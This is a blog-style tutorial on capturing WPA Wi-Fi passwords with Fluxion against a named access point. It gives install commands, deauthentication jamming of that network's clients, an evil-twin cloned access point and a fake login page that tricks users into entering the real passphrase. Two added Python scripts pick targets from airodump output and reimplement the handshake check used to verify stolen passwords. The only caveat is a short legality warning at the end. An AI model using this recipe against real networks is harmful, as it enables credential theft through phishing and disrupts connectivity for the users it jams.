How to Capture WPA Passwords with Fluxion


- Kamis, 11 April 2019

Our goal in this article is to target an organization through its WPA-encrypted Wi-Fi network. We will attack the users attached to the access point "Probe": capture a handshake, jam the target AP, stand up a cloned (evil twin) AP with a fake login page, and confirm every password a user submits against the captured handshake, so that the password we walk away with is known to be correct.





Install Fluxion


git clone https://github.com/wi-fi-analyzer/fluxion
cd fluxion
sudo ./fluxion
sudo ./Installer.sh
A window will open to handle installing the missing packages. Be patient and let it finish installing the dependencies.
Once every dependency is met, the dependency board shows all green and we can proceed to the attack interface. Run Fluxion again with sudo ./fluxion to start the attack.

Scan Wi-Fi


Fluxion starts an airodump-ng scan of nearby networks. Give it 20-30 seconds so that clients, not just beacons, have time to show up.
Press Ctrl+C to stop the capture as soon as the wireless network you want appears in the list.


Choose Your Target AP


Select a target with active clients by entering the number next to it. This attack will not work on a network without clients, unless you intend to wait (possibly for a long time) for one to connect: the deauthentication step needs a client to kick off the network, and the handshake we want is only produced when that client reconnects.
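Fluxion presents the scan results in its own menu, but the data behind that menu is the CSV file that airodump-ng writes. The following added example (written for this page, not part of Fluxion or Aircrack-ng) parses that CSV format over a constructed sample and applies the selection rule from the paragraph above: keep only WPA/WPA2-PSK networks that have at least one associated client. It also records unassociated stations that are probing for a target's ESSID, since an evil twin broadcasting that name can attract them without a deauthentication. The BSSIDs, MACs and ESSIDs in the sample are made up.

```python
import csv
import io

# Constructed airodump-ng CSV export (not a real capture). "airodump-ng -w <prefix>"
# writes <prefix>-01.csv with two tables: access points, a blank line, then stations.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2019-04-11 10:00:01, 2019-04-11 10:00:30,  6,  54, WPA2, CCMP, PSK, -48,  120,  0,   0.  0.  0.  0,   5, Probe, 
66:77:88:99:AA:BB, 2019-04-11 10:00:02, 2019-04-11 10:00:29, 11,  54, WPA2, CCMP, PSK, -70,   80,  0,   0.  0.  0.  0,   9, GuestWifi, 
AA:BB:CC:DD:EE:FF, 2019-04-11 10:00:03, 2019-04-11 10:00:28,  1,  54, OPN ,     ,    , -60,   40,  0,   0.  0.  0.  0,   4, Cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
DE:AD:BE:EF:00:01, 2019-04-11 10:00:05, 2019-04-11 10:00:30, -52,      300, 00:11:22:33:44:55, Probe
DE:AD:BE:EF:00:02, 2019-04-11 10:00:06, 2019-04-11 10:00:29, -55,      150, 00:11:22:33:44:55, 
DE:AD:BE:EF:00:03, 2019-04-11 10:00:07, 2019-04-11 10:00:20, -80,        5, (not associated) , GuestWifi,Probe
"""


def parse_airodump_csv(text: str) -> dict:
    """Return {bssid: ap_info} with each AP's associated clients and the
    unassociated stations that are probing for its ESSID."""
    ap_block, _, sta_block = text.partition("\n\n")
    aps = {}
    for row in csv.reader(io.StringIO(ap_block)):
        row = [f.strip() for f in row]          # airodump pads every field with spaces
        if len(row) < 14 or row[0] == "BSSID":  # blank line or header
            continue
        aps[row[0]] = {"bssid": row[0], "channel": int(row[3]), "privacy": row[5],
                       "power": int(row[8]), "essid": row[13], "clients": [], "probing": []}
    by_essid = {ap["essid"]: ap for ap in aps.values() if ap["essid"]}
    for row in csv.reader(io.StringIO(sta_block)):
        row = [f.strip() for f in row]
        if len(row) < 6 or row[0] == "Station MAC":
            continue
        station, bssid, probed = row[0], row[5], [p for p in row[6:] if p]
        if bssid in aps:
            aps[bssid]["clients"].append(station)
        else:
            # "(not associated)": an evil twin with one of these ESSIDs may still attract it
            for essid in probed:
                if essid in by_essid:
                    by_essid[essid]["probing"].append(station)
    return aps


def viable_targets(aps: dict) -> list:
    """WPA/WPA2-PSK networks with at least one associated client, strongest signal first."""
    return sorted((ap for ap in aps.values() if ap["privacy"].startswith("WPA") and ap["clients"]),
                  key=lambda ap: ap["power"], reverse=True)


if __name__ == "__main__":
    for ap in viable_targets(parse_airodump_csv(SAMPLE_CSV)):
        print(f"{ap['essid']:<12} {ap['bssid']}  ch {ap['channel']:<3} {ap['power']} dBm  "
              f"clients={len(ap['clients'])}  probing={len(ap['probing'])}")
```

On the sample, only "Probe" qualifies: "GuestWifi" is WPA2 but has no associated client (one station is merely probing for it), and "Cafe" is open, so there is no PSK to capture.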



Select Your Attack


Once you've typed the number of the target network, press Enter to load the network profile into the attack selector. For our purposes we will use option 1, which creates a "FakeAP" using hostapd: a rogue hotspot that reuses the captured ESSID, BSSID and channel to clone the target access point. Type 1 and press Enter.



Get a Handshake


In order to verify that any password we receive actually works, we will check it against a captured handshake. If you already have one, enter its path at the next screen. If not, press Enter to force the network to produce a handshake in the next step.
Using the Aircrack-ng method (option 1, "aircrack-ng"), Fluxion sends spoofed deauthentication frames to the target AP's clients and listens for the WPA four-way handshake that a client produces when it reconnects. When "WPA handshake:" followed by the target BSSID appears in the top right of the airodump-ng window, as in the screenshot below, you have captured it. Type 1 (for "Check handshake") and press Enter to load the handshake into our attack configuration.


Create the Fake Login Page


Select option 1, "Web Interface," to use the social engineering tool.
Then select the language of the fake login page to match what the victim would expect to see; a page in the wrong language is an immediate giveaway.


Capture the Password


The user is directed to a fake login page, which is either convincing or not, depending on the page you chose.
Entering the wrong password fails the handshake verification, and the user is prompted to try again. Upon entering the correct password, Aircrack-ng verifies it against the handshake, saves it to a text file and displays it on the screen. The user is directed to a "thank you" page as the jamming ceases and the fake access point shuts down.

You can verify your success by checking the readout of the Aircrack-ng screen.
Congratulations, you've obtained and verified a password by targeting the "wetware": we tricked a user into typing the password rather than relying on a flaw in the encryption itself.
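The "verification" in the "Get a Handshake" and "Capture the Password" steps is a fixed computation, and seeing it spelled out explains why a wrong password can be rejected offline before the victim is let go. The following added example (written for this page, not code from Fluxion or Aircrack-ng) reproduces the check: derive the PMK from the candidate passphrase and SSID with PBKDF2, derive the Key Confirmation Key with the 802.11i PRF, recompute the MIC of the client's message 2 of the four-way handshake, and compare. Because no real capture is available offline, build_msg2 constructs that message 2 under a known passphrase; the SSID "Probe" is the page's, while the MACs, nonces and passphrases are made up.

```python
import hashlib
import hmac
import struct

# Constructed handshake parameters for the demo (not taken from a real capture).
SSID = b"Probe"
AP_MAC = bytes.fromhex("001122334455")    # hypothetical BSSID of "Probe"
STA_MAC = bytes.fromhex("66778899aabb")   # hypothetical client MAC
ANONCE = bytes(range(32))                 # fixed nonces so the run is reproducible
SNONCE = bytes(range(32, 64))

# Offset of the 16-byte Key MIC inside an EAPOL-Key frame: EAPOL header (4) + descriptor type (1)
# + key info (2) + key length (2) + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: the first 16 bytes of the PTK from the 802.11i PRF-512."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck: bytes, frame: bytes, version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. Key descriptor version 1
    (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(passphrase: str, version: int = 2) -> bytes:
    """Simulate message 2 of the four-way handshake as the client would send it: its SNonce plus
    a MIC keyed by the real PSK. This is the frame a capture lets us test candidates against."""
    key_info = 0x0100 | 0x0008 | version          # MIC bit, pairwise bit, descriptor version
    body = (b"\x02" + struct.pack(">HHQ", key_info, 16, 1) + SNONCE   # RSN descriptor, key len, replay ctr
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                 # key IV, key RSC, key ID
            + b"\x00" * 16 + struct.pack(">H", 0))                     # MIC placeholder, key data length
    frame = b"\x01\x03" + struct.pack(">H", len(body)) + body          # EAPOL v1, type EAPOL-Key
    kck = derive_kck(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, version) + frame[MIC_OFFSET + 16:]


def check_passphrase(candidate: str, msg2: bytes, version: int = 2) -> bool:
    """What aircrack-ng does per candidate: PMK -> KCK -> recompute the MIC -> compare."""
    kck = derive_kck(pmk_from_passphrase(candidate, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return hmac.compare_digest(eapol_mic(kck, msg2, version), msg2[MIC_OFFSET:MIC_OFFSET + 16])


if __name__ == "__main__":
    captured = build_msg2("correct horse battery staple")     # stands in for the .cap file
    for guess in ["password123", "correct horse battery staple"]:
        print(f"{guess!r}: {'KEY FOUND' if check_passphrase(guess, captured) else 'rejected'}")
```

Two practical points follow from the code. The 4096-round PBKDF2 is the expensive part (it is why a captured handshake gives an attacker only an offline guessing game, not the key), and the check needs the SSID, both MACs, both nonces and one MIC-bearing message, which is exactly the set of fields a capture tool must have seen before it can report "WPA handshake".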


Warning: 

This Technique Could Be Illegal Without Permission

Fluxion combines scanning, cloning, running a fake AP, serving a phishing login page, and driving Aircrack-ng to capture WPA handshakes and verify passwords against them. As such, it leaves signatures in router logs consistent with each of these techniques. These practices are illegal and unwelcome on any network you don't have permission to audit.